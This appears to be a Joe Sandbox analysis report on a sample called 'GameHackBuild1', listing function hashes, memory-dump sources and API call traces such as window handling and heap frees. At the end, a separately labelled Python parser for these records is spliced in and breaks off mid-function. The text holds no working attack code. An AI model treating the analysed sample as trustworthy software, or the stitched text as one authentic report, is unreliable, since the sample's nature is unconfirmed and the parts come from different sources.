                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 8983da443697821b190ef67dfa365339a2a29d3bec39beb7fe9f220aa576b180
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: 83C1AF362050B30ADF2D473DA53483FFAA25AA27B131A077DD4B2CB5D6FE20D564DA20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: f9ec97d5b964c19a546b8c999e349df3f11358a3739ea329bd777b1217c69de0
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: 4BC193362095B30ADF6D473DA53443FBAA25AA27B131A077DE4B2CB4C5FE20D564DA20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction ID: dc1f2937ce8f44e57f57529e4f42b1d147ceb4aa41f605bd62b0528611a50e60
                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                      • Instruction Fuzzy Hash: CFC190362055B30ADF2D473DA53483FBAA25AA27B131A077DD4B3CB5C6FE20D564DA20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 2df2e8399b47309d283449a709da93d7c890cccf4bb80df15be7cc981e38628e
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: A5C1A3362055B30ADF2D873DA53483FBAA25AA17B131A077DD4B3CB5D6FE20D524DA20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 177b6fe814c1e69309c4b245eaf7a9fcc4723bafa91e941ec417755a991652bd
                                      • Instruction ID: 49739dbe508b19916adf71094ca3b6a4e970938031f5b67d287ac053ea61e842
                                      • Opcode Fuzzy Hash: 177b6fe814c1e69309c4b245eaf7a9fcc4723bafa91e941ec417755a991652bd
                                      • Instruction Fuzzy Hash: 26E126799183848FC304CF69D89096ABBF0ABDA300F85095EF5D597352C336EA19DB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6ee40635f5eb985b3bbee2261c61159bd369e52b8a1a067f630af1631055f8c
                                      • Instruction ID: 4d621faf2ebabdbc7afc034735d56106733c92e889271a4ecdc94c06770ed848
                                      • Opcode Fuzzy Hash: a6ee40635f5eb985b3bbee2261c61159bd369e52b8a1a067f630af1631055f8c
                                      • Instruction Fuzzy Hash: 8B915B722087498BDF24EF68D991BFA77E5EF90300F10492DE597D72C2EA749688C381
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d0bc21953d1cf7da74f6ad1bb32984e2b7059808fb75242b23e32a3e582cd92
                                      • Instruction ID: 1d838e4916a07e7e8d8bd43a4c52140a92266bc4cae5cc031153f441a54000e5
                                      • Opcode Fuzzy Hash: 2d0bc21953d1cf7da74f6ad1bb32984e2b7059808fb75242b23e32a3e582cd92
                                      • Instruction Fuzzy Hash: 4B619B71A84B3856DE389B2CB955BBF2394EB0D780F100A39E883DB2C1D651DD82C759
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                      • Instruction ID: d2e0b3960cd00f2b411606a7764fd91f9d831de1a99609363c504b28c1193d52
                                      • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                      • Instruction Fuzzy Hash: 557102727043454BDF24DF29D9D0BFE77E5ABA4304F00492DE9C68B2C2DA749ACA8752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
                                      • Instruction ID: d4c21bf6f1a715cec8c30bccce0ff77cd4defca21d250f6f5d75cc1b72f1ce4d
                                      • Opcode Fuzzy Hash: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
                                      • Instruction Fuzzy Hash: 50518870A10AB45BDB388B3CB955BBF27D9AB5F300F180539E993DB282C324DD419392
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88a2611c7a51ba895fdc97861134805914643a57c2252e68cf242a9e67e6dbe9
                                      • Instruction ID: 2b0a481693c7d62a9b5ae2741b7c506bbca5752d47809ab594c818c176633d2b
                                      • Opcode Fuzzy Hash: 88a2611c7a51ba895fdc97861134805914643a57c2252e68cf242a9e67e6dbe9
                                      • Instruction Fuzzy Hash: EE819F9E61D6D8DEC716CFBC38A42B93FA157B3300B1845AAC4C6C62A3C177459AD722
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 465b728b596a0255ba025d2ad261cacbe4c5018ea29737475f2086837c838f69
                                      • Instruction ID: 9923a90b89f71d5df14f81a4c6a7b594f04cbc238bf265c845175145a2801e08
                                      • Opcode Fuzzy Hash: 465b728b596a0255ba025d2ad261cacbe4c5018ea29737475f2086837c838f69
                                      • Instruction Fuzzy Hash: 1E51D035A083D94EC712CF28A18056EFFE0BFDA354F594C9EE4D55B242D2209649DB92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00a08b0108029b1ee80143d2c3a6372bb1803bc646f10569c24c6e3519ccc905
                                      • Instruction ID: 102a7dde95b867f456fc03f5987b3fc86237a163977f65e988502cb08c7d271b
                                      • Opcode Fuzzy Hash: 00a08b0108029b1ee80143d2c3a6372bb1803bc646f10569c24c6e3519ccc905
                                      • Instruction Fuzzy Hash: 90512671A083158FC748CF19E48055AF7E1FFC8354F058A2EE899A7740DB34E959CB96
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                      • Instruction ID: a4ff851d60c01f5617ec0cec516820fe9748a14cba1ac26a85340298c71024e1
                                      • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                      • Instruction Fuzzy Hash: 3E312BB26047498FCB14DF28C8512AEBBE0FB95310F14892DE4D5C7382C735EA89CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bf20ceec5c8d80c975fb9f66e54a77dbf31447cbf102b29e3d8fa6ec0fc8892
                                      • Instruction ID: de5343630bf2d494730c038799e11131cbe5724ba915243f2908e9da05677e17
                                      • Opcode Fuzzy Hash: 6bf20ceec5c8d80c975fb9f66e54a77dbf31447cbf102b29e3d8fa6ec0fc8892
                                      • Instruction Fuzzy Hash: F7210A36E241664FCB48CF6DECD08377765AB86311746812BFA428B2D0C535ED26DBA0
                                      APIs
                                      • _swprintf.LIBCMT ref: 00A0DABE
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                        • Part of subcall function 00A11596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00A40EE8,?,00A0D202,00000000,?,00000050,00A40EE8), ref: 00A115B3
                                      • _strlen.LIBCMT ref: 00A0DADF
                                      • SetDlgItemTextW.USER32(?,00A3E154,?), ref: 00A0DB3F
                                      • GetWindowRect.USER32(?,?), ref: 00A0DB79
                                      • GetClientRect.USER32(?,?), ref: 00A0DB85
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A0DC25
                                      • GetWindowRect.USER32(?,?), ref: 00A0DC52
                                      • SetWindowTextW.USER32(?,?), ref: 00A0DC95
                                      • GetSystemMetrics.USER32(00000008), ref: 00A0DC9D
                                      • GetWindow.USER32(?,00000005), ref: 00A0DCA8
                                      • GetWindowRect.USER32(00000000,?), ref: 00A0DCD5
                                      • GetWindow.USER32(00000000,00000002), ref: 00A0DD47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d
                                      • API String ID: 2407758923-2512411981
                                      • Opcode ID: 43705c993219f8a1d06375fd33c255f3e554a9465cd55914c35c5c5e79dccd9a
                                      • Instruction ID: eba40b5100d266c196db799865bdc3cc1b30755e73cdc0a9074325536e3d2189
                                      • Opcode Fuzzy Hash: 43705c993219f8a1d06375fd33c255f3e554a9465cd55914c35c5c5e79dccd9a
                                      • Instruction Fuzzy Hash: FE819172508345AFD710DFA8DD89F6BBBF9EB89704F04091DFA84A3290D670E906CB52
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00A2C277
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE2F
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE41
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE53
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE65
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE77
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE89
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE9B
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEAD
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEBF
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BED1
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEE3
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEF5
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BF07
                                      • _free.LIBCMT ref: 00A2C26C
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A2C28E
                                      • _free.LIBCMT ref: 00A2C2A3
                                      • _free.LIBCMT ref: 00A2C2AE
                                      • _free.LIBCMT ref: 00A2C2D0
                                      • _free.LIBCMT ref: 00A2C2E3
                                      • _free.LIBCMT ref: 00A2C2F1
                                      • _free.LIBCMT ref: 00A2C2FC
                                      • _free.LIBCMT ref: 00A2C334
                                      • _free.LIBCMT ref: 00A2C33B
                                      • _free.LIBCMT ref: 00A2C358
                                      • _free.LIBCMT ref: 00A2C370
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: b41ef52bdeb38c7b58cbd39b1bfd212cab961d822f58dd0344c344488574caa8
                                      • Instruction ID: afea6800d5b3144653bf61dfc332fa38cd4c0b9f2a736340158866530cef1133
                                      • Opcode Fuzzy Hash: b41ef52bdeb38c7b58cbd39b1bfd212cab961d822f58dd0344c344488574caa8
                                      • Instruction Fuzzy Hash: 06315C326002259FEB20AB7CEA45B9AB3E9BF00320F148879F449DB951DF35EC408B60
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00A1CD51
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00A1CD7D
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A1CD99
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A1CDB0
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A1CDC4
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A1CDED
                                      • DeleteObject.GDI32(00000000), ref: 00A1CDF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00A1CDFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: 7f9632f035723a06039396dbed21d76f4e1ef79e7fd6f2674f319b65fb1a57b8
                                      • Instruction ID: a67e901e5064a9f0e61ee5bae770ea5065999061c4fecb30fe84e6111766b8c4
                                      • Opcode Fuzzy Hash: 7f9632f035723a06039396dbed21d76f4e1ef79e7fd6f2674f319b65fb1a57b8
                                      • Instruction Fuzzy Hash: 97110A725847107BE631EBA0AC0AFDF766CFF55751F014520FA42A60D2CAA48D8787A5
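Each "APIs" record above is one call per line: an optional "Part of subcall function" prefix, the API name and module, the argument list as the sandbox recovered it (`?` for values it could not resolve), and the call-site address after `ref:`. Once parsed, such records can be rendered as a per-function call sequence, which is what you compare when deciding whether two functions across samples are the same code. The following is an added example, not part of the Joe Sandbox report or its tooling: the line grammar, the symbolic decoding table (values from winuser.h and richedit.h) and the sample record, copied from the GetWindow/GetClassNameW listing directly above, are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: lines copied from the function record above (one
# "APIs" block), embedded so the example runs offline.
APIS_SAMPLE = """\
APIs
• GetWindow.USER32(?,00000005), ref: 00A1CD51
• GetClassNameW.USER32(00000000,?,00000800), ref: 00A1CD7D
  • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A1CDB0
• _swprintf.LIBCMT ref: 00A0DABE
• GetWindow.USER32(00000000,00000002), ref: 00A1CDFD
"""

# Assumed line grammar:
#   [• ][Part of subcall function ADDR: ]Api.MODULE[(args)][,] ref: ADDR
_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

Arg = Union[int, str]  # 32-bit immediate, or "?" / symbol / string literal

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: str                          # address of the call instruction
    subcall_of: Optional[str] = None  # set when listed under a callee

def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if re.fullmatch(r"[0-9A-F]{8}", tok):
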